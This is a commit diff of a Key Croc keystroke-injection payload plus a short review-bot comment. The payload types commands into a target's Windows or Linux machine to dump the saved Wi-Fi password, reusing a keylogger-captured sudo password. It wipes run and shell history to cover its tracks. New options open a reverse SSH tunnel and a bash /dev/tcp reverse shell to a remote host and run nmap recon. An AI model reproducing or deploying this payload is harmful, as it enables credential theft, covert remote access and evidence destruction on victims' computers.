Update Croc_getonline.txt
minor changes: new options recon, ssh; keycroc MATCH command performs specific tasks
pull/62/head
parent
691ec577f4
commit
ec819336d7
|
@ -1,118 +1,364 @@
|
||||||
# Title: Croc_Getonline
|
# Title: Croc_Getonline
|
||||||
# Description: Attempt to connect Keycroc automatically to target wifi access point
|
# Description: Attempt to connect Keycroc automatically to target wifi access point
|
||||||
# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt
|
# Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
|
||||||
# Author: spywill
|
# Author: spywill
|
||||||
# Version: 3.5
|
# Version: 4.1
|
||||||
# Category: Key Croc
|
# Category: Key Croc
|
||||||
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
|
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
|
||||||
|
|
||||||
MATCH (getonline_W|getonline_R|getonline_L)
|
# getonline_W <-- MATCH word for windows, Attempt connection to access point
|
||||||
|
# getonline_L <-- MATCH word for Linux, Attempt connection to access point
|
||||||
|
# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point
|
||||||
|
# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD )
|
||||||
|
# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID
|
||||||
|
# getonline_K <-- MATCH word for killing keycroc wlan0 interface
|
||||||
|
# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE
|
||||||
|
# getonline_H <-- MATCH word for entering ATTACKMODE HID
|
||||||
|
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
|
||||||
|
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
|
||||||
|
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
|
||||||
|
|
||||||
CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot)
|
MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
|
||||||
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done
|
QUACK LOCK
|
||||||
|
|
||||||
wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt
|
#---> Edit payload option below
|
||||||
|
option=0
|
||||||
|
keycroc_password=hak5croc
|
||||||
|
wifi_pass=/tools/wifipass.txt
|
||||||
|
|
||||||
if [ -f $wifi_pass ]; then
|
#---> Edit remote host below
|
||||||
cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt
|
remote_user_name=EDIT_REMOTE_USERNAME_HERE
|
||||||
rm -f $wifi_pass
|
remote_host_ip=EDIT_REMOTE_HOST_IP_HERE
|
||||||
|
remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE
|
||||||
|
port=7000
|
||||||
|
|
||||||
|
#---> Edit known SSID and password below
|
||||||
|
known_ssid=EDIT_KNOWN_SSID_HERE
|
||||||
|
known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
|
||||||
|
|
||||||
|
#---> Edit recon scan on/off below
|
||||||
|
recon=off
|
||||||
|
recon_loot=/root/udisk/tools/Target_SSID.txt
|
||||||
|
|
||||||
|
#---> Edit Linux target password below
|
||||||
|
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
|
||||||
|
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
|
||||||
|
else
|
||||||
|
target_password=ENTER_LINUX_PASSWORD_HERE
|
||||||
fi
|
fi
|
||||||
|
|
||||||
ATTACKMODE HID STORAGE
|
recon_scan() {
|
||||||
Q DELAY 5000
|
if [ "$recon" = "on" ]; then
|
||||||
LED ATTACK
|
if [ "$LOOT" = "getonline_W" ]; then
|
||||||
|
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
|
||||||
|
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
elif [ "$recon" = "off" ]; then
|
||||||
|
:
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
ENTER_STORAGE() {
|
||||||
|
if [ -f ~/udisk$wifi_pass ]; then
|
||||||
|
cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt
|
||||||
|
rm -f ~/udisk$wifi_pass
|
||||||
|
fi
|
||||||
|
ATTACKMODE HID STORAGE
|
||||||
|
QUACK DELAY 5000
|
||||||
|
LED ATTACK
|
||||||
|
}
|
||||||
|
|
||||||
|
RESET_PAYLOAD() {
|
||||||
|
QUACK UNLOCK
|
||||||
|
sleep 5 ; LED OFF
|
||||||
|
killall -9 bash
|
||||||
|
killall -9 python
|
||||||
|
sleep 1
|
||||||
|
RELOAD_PAYLOADS
|
||||||
|
}
|
||||||
|
|
||||||
|
CLEAN_UP() {
|
||||||
|
if [ "$LOOT" = "getonline_W" ]; then
|
||||||
|
QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
|
||||||
|
QUACK STRING "history -c ; rm -f ~/.bash_history"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
case $LOOT in
|
case $LOOT in
|
||||||
getonline_W)
|
getonline_W)
|
||||||
Q GUI r
|
ENTER_STORAGE
|
||||||
Q DELAY 3000
|
QUACK GUI r
|
||||||
Q STRING "powershell -NoP -NonI -W Hidden"
|
QUACK DELAY 3000
|
||||||
Q ENTER
|
QUACK STRING "powershell -NoP -NonI -W Hidden"
|
||||||
Q DELAY 5000
|
QUACK ENTER
|
||||||
Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
|
QUACK DELAY 5000
|
||||||
Q ENTER
|
QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
|
||||||
Q DELAY 3000
|
QUACK ENTER
|
||||||
Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
|
QUACK DELAY 3000
|
||||||
Q ENTER
|
QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
|
||||||
Q DELAY 2000
|
QUACK ENTER
|
||||||
Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
|
||||||
Q DELAY 2000
|
QUACK ENTER
|
||||||
Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\""
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\""
|
||||||
Q DELAY 5000
|
QUACK ENTER
|
||||||
Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit"
|
QUACK DELAY 5000
|
||||||
Q ENTER
|
recon_scan
|
||||||
|
CLEAN_UP
|
||||||
|
QUACK STRING "exit"
|
||||||
|
QUACK ENTER
|
||||||
|
ATTACKMODE HID
|
||||||
;;
|
;;
|
||||||
getonline_R)
|
getonline_R)
|
||||||
Q CONTROL-ALT-d
|
ENTER_STORAGE
|
||||||
Q CONTROL-ALT-t
|
QUACK CONTROL-ALT-d
|
||||||
Q DELAY 2000
|
QUACK CONTROL-ALT-t
|
||||||
Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
|
||||||
Q DELAY 2000
|
QUACK ENTER
|
||||||
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
|
||||||
Q DELAY 2000
|
QUACK ENTER
|
||||||
Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
|
||||||
Q DELAY 2000
|
QUACK ENTER
|
||||||
Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
|
QUACK DELAY 2000
|
||||||
Q ENTER
|
QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass"
|
||||||
Q DELAY 3000
|
QUACK ENTER
|
||||||
Q STRING "umount \$MOUNT_POINT ; exit"
|
QUACK DELAY 3000
|
||||||
Q ENTER
|
recon_scan
|
||||||
|
CLEAN_UP
|
||||||
|
QUACK STRING "umount \$MOUNT_POINT ; exit"
|
||||||
|
QUACK ENTER
|
||||||
|
ATTACKMODE HID
|
||||||
;;
|
;;
|
||||||
getonline_L)
|
getonline_L)
|
||||||
if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
|
ENTER_STORAGE
|
||||||
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
|
QUACK CONTROL-ALT-d
|
||||||
|
QUACK ALT-t
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "$target_password"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 3000
|
||||||
|
recon_scan
|
||||||
|
CLEAN_UP
|
||||||
|
QUACK STRING "sudo umount \$MOUNT_POINT ; exit"
|
||||||
|
QUACK ENTER
|
||||||
|
ATTACKMODE HID
|
||||||
|
;;
|
||||||
|
getonline_N)
|
||||||
|
LED B
|
||||||
|
sleep 2
|
||||||
|
echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass
|
||||||
|
;;
|
||||||
|
getonline_F)
|
||||||
|
if [ -f ~/udisk$wifi_pass ]; then
|
||||||
|
LED B
|
||||||
|
sleep 2
|
||||||
else
|
else
|
||||||
PC_PW=LINUX
|
LED R
|
||||||
|
RESET_PAYLOAD
|
||||||
fi
|
fi
|
||||||
Q CONTROL-ALT-d
|
;;
|
||||||
Q ALT-t
|
getonline_K)
|
||||||
Q DELAY 2000
|
ifconfig wlan0 down
|
||||||
Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
|
LED R
|
||||||
Q ENTER
|
RESET_PAYLOAD
|
||||||
Q DELAY 2000
|
;;
|
||||||
Q STRING "$PC_PW"
|
getonline_S)
|
||||||
Q ENTER
|
ATTACKMODE HID STORAGE
|
||||||
Q DELAY 2000
|
RESET_PAYLOAD
|
||||||
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
|
;;
|
||||||
Q ENTER
|
getonline_H)
|
||||||
Q DELAY 2000
|
ATTACKMODE HID
|
||||||
Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
|
RESET_PAYLOAD
|
||||||
Q ENTER
|
;;
|
||||||
Q DELAY 2000
|
getonline_P)
|
||||||
Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt"
|
ATTACKMODE HID SERIAL
|
||||||
Q ENTER
|
RESET_PAYLOAD
|
||||||
Q DELAY 3000
|
;;
|
||||||
Q STRING "sudo umount \$MOUNT_POINT ; exit"
|
getonline_A)
|
||||||
Q ENTER
|
ATTACKMODE HID AUTO_ETHERNET
|
||||||
|
RESET_PAYLOAD
|
||||||
|
;;
|
||||||
|
getonline_X)
|
||||||
|
LED R
|
||||||
|
rm -f /root/udisk/payloads/Croc_getonline.txt
|
||||||
|
rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt
|
||||||
|
rm -f $recon_loot root/udisk/config.txt
|
||||||
|
apt -y remove sshpass
|
||||||
|
reboot --force
|
||||||
;;
|
;;
|
||||||
esac
|
esac
|
||||||
|
|
||||||
ATTACKMODE HID
|
|
||||||
sleep 3
|
sleep 3
|
||||||
|
|
||||||
LED SETUP
|
word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w)
|
||||||
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient)
|
if [[ $word_count -eq 2 ]]; then
|
||||||
|
ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)"
|
||||||
|
matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')"
|
||||||
|
sleep 1
|
||||||
|
if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then
|
||||||
|
LED SETUP
|
||||||
|
else
|
||||||
|
LED R
|
||||||
|
RESET_PAYLOAD
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
LED R
|
||||||
|
RESET_PAYLOAD
|
||||||
|
fi
|
||||||
|
|
||||||
|
kill -9 $(pidof wpa_supplicant)
|
||||||
|
kill -9 $(pidof dhclient)
|
||||||
ifconfig wlan0 down
|
ifconfig wlan0 down
|
||||||
|
|
||||||
if [ "$LOOT" = "getonline_W" ]; then
|
if [ "$LOOT" = "getonline_W" ]; then
|
||||||
sed -i '0,/./s/^.//' $wifi_pass
|
sed -i '0,/./s/^.//' ~/udisk$wifi_pass
|
||||||
sed -i 's/\r//g' $wifi_pass
|
sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass
|
||||||
|
sed -i 's/\r//g' ~/udisk$wifi_pass
|
||||||
fi
|
fi
|
||||||
|
|
||||||
sed -i 's/\( \)*/\1/g' $wifi_pass
|
sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass
|
||||||
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt
|
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
|
||||||
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
|
sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
|
||||||
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf
|
wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf
|
||||||
|
|
||||||
ifconfig wlan0 up
|
ifconfig wlan0 up
|
||||||
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0
|
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf
|
||||||
|
dhclient wlan0
|
||||||
sleep 3
|
sleep 3
|
||||||
systemctl restart ssh.service
|
systemctl restart ssh.service
|
||||||
|
|
||||||
[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R
|
if : >/dev/tcp/8.8.8.8/53; then
|
||||||
|
if [ $option -eq 0 ]; then
|
||||||
|
:
|
||||||
|
elif [ $option -eq 1 ]; then
|
||||||
|
case "$LOOT" in
|
||||||
|
getonline_W)
|
||||||
|
QUACK GUI m
|
||||||
|
QUACK GUI r
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "powershell"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 5000
|
||||||
|
;;
|
||||||
|
getonline_R)
|
||||||
|
QUACK CONTROL-ALT-d
|
||||||
|
QUACK CONTROL-ALT-t
|
||||||
|
QUACK DELAY 2000
|
||||||
|
;;
|
||||||
|
getonline_L)
|
||||||
|
QUACK CONTROL-ALT-d
|
||||||
|
QUACK ALT-t
|
||||||
|
QUACK DELAY 2000
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)"
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 2000
|
||||||
|
QUACK STRING "$keycroc_password"
|
||||||
|
QUACK ENTER
|
||||||
|
elif [ $option -eq 2 ]; then
|
||||||
|
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
|
||||||
|
if [ ! $? = 0 ] || [ ! "$status" = installed ]; then
|
||||||
|
apt -y install sshpass
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
sleep 1
|
||||||
|
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
|
||||||
|
cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null
|
||||||
|
rm -rf ~/.ssh 2>/dev/null
|
||||||
|
ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
|
||||||
|
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
|
||||||
|
sleep 1
|
||||||
|
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
|
||||||
|
else
|
||||||
|
LED R
|
||||||
|
sleep 1
|
||||||
|
fi
|
||||||
|
elif [ $option -eq 3 ]; then
|
||||||
|
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
|
||||||
|
/bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 &
|
||||||
|
else
|
||||||
|
LED R
|
||||||
|
sleep 1
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
LED FINISH
|
||||||
|
fi
|
||||||
|
LED FINISH
|
||||||
|
else
|
||||||
|
LED R
|
||||||
|
fi
|
||||||
|
|
||||||
sleep 3
|
sleep 3
|
||||||
LED OFF
|
LED OFF
|
||||||
|
QUACK UNLOCK
|
||||||
|
|
||||||
|
if [ "$recon" = "on" ]; then
|
||||||
|
LED C SLOW
|
||||||
|
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
|
||||||
|
ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass)
|
||||||
|
iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot
|
||||||
|
echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot
|
||||||
|
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
|
||||||
|
cat /etc/resolv.conf | grep nameserver >> $recon_loot
|
||||||
|
|
||||||
|
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
|
||||||
|
calculate_network_range() {
|
||||||
|
ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
|
||||||
|
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
|
||||||
|
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
|
||||||
|
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
|
||||||
|
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
|
||||||
|
echo "$network_range"
|
||||||
|
}
|
||||||
|
perform_nmap_scan() {
|
||||||
|
local network_range=$1
|
||||||
|
nmap -T4 -F $network_range >> $recon_loot
|
||||||
|
}
|
||||||
|
network_range=$(calculate_network_range)
|
||||||
|
perform_nmap_scan $network_range
|
||||||
|
|
||||||
|
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
|
||||||
|
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
|
||||||
|
echo -ne "\n\n" >> $recon_loot
|
||||||
|
LED OFF
|
||||||
|
elif [ "$recon" = "off" ]; then
|
||||||
|
:
|
||||||
|
else
|
||||||
|
:
|
||||||
|
fi
|
||||||
|
|
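Review bot: `$network_range` is interpolated into the recon header on the `echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot` line before `network_range=$(calculate_network_range)` assigns it, so the header written to the loot file always records an empty target; move that `echo` below the assignment (or after `perform_nmap_scan $network_range`). Separately, the second config.txt edit `sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};...' root/udisk/config.txt` still targets the relative path `root/udisk/config.txt` while the line above it was changed to `~/udisk/config.txt`, and the `getonline_X` cleanup `rm -f $recon_loot root/udisk/config.txt` has the same relative path; unless the payload runs with `/` as its working directory these presumably operate on a file that does not exist. Both should use the same absolute path as the surrounding lines, e.g. `~/udisk/config.txt`.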